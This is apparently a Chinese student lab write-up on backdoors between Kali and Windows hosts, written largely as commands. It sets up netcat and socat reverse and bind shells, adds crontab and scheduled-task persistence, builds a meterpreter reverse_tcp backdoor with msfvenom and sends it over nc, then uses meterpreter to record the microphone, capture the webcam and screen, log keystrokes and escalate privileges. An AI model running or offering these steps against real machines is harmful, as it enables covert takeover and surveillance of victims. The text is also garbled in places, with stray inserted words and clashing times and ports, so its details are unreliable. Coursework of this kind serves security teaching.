在windows下,打开CMD,使用ipconfig
指令查看本机IP
linux
而后使用ncat.exe程序,ncat.exe -l -p 5206
监听本机的5206端口web
在kali端,使用nc指令的-e选项,nc 192.168.56.1(主机ip) 5206(所设置的端口) -e /bin/sh
反向链接Windows主机的5206端口:
shell
随后在windows端,就可使用kali的命令行了
vim
ifconfig
查看IP使用nc指令,nc -l -p 5206
,监听5206端口
windows
而后,在windows,输入ncat.exe -e cmd.exe 192.168.92.168 5206
tcp
而后,在kali端,就可使用windows的cmd了
工具
先在Windows系统下,用ncat.exe -l -p 5206
,监听5206端口测试
用crontab -e
指令编辑一条定时任务(输入3,选vim.basic)ui
在最后一行加入43 * * * * /bin/netcat 192.168.56.1 5206 -e /bin/sh
,意思是在每一个小时的第30分钟(为测试结果方便所选时间最好离现实时间较近)反向链接Windows主机的5220端口,就会启动cron
命令行
到时间后,便得到了Kali的shell,能够输入指令
在Windows系统下,打开控制面板->管理工具->任务计划程序(可在控制面板直接搜索任务计划),建立任务,填写任务名称后,新建一个触发器:
下载安装socat软件
在操做->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5206 exec:cmd.exe,pty,stderr
,这个命令的做用是把cmd.exe绑定到端口5206,同时把cmd.exe的stderr重定向到stdout上;
建立完成以后,按Windows+L快捷键锁定计算机,再次打开时,能够发现以前建立的任务已经开始运行,或者能够右键单击,而后选择运行也能够
socat - tcp:192.168.1.101:5220
,这里的第一个参数-表明标准的输入输出,第二个流链接到Windows主机的5220端口,此时能够发现已经成功得到了一个cmd shell输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.128 LPORT=5206 -f exe > 20155206.exe
生成后门程序(LHOST=kali linux的IP)
而后经过nc
指令将生成的后门程序传送到Windows主机上
windows:ncat.exe -l 5206 > 20155206.exe
kali:nc 192.168.56.1 5206 < 20155206.exe
在Kali上使用msfconsole
指令进入msf控制台,set payload windows/meterpreter/reverse_tcp
,使用监听模块,设置payload,设置反弹回连的IP和端口
设置完成后,利用exploit
,执行监听,在windows中,利用20155206.exe
运行20155206.exe
此时Kali上已经得到了Windows主机的链接,而且获得了远程控制的shell
record_mic
指令能够截获一段音频webcam_snap
指令可使用摄像头进行拍照webcam stream
指令可使用摄像头进行录像screenshot
指令能够进行截屏keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录先使用getuid
指令查看当前用户,使用getsystem
指令进行提权,如图所示,提权成功
1.Meterpreter有哪些给你映像深入的功能?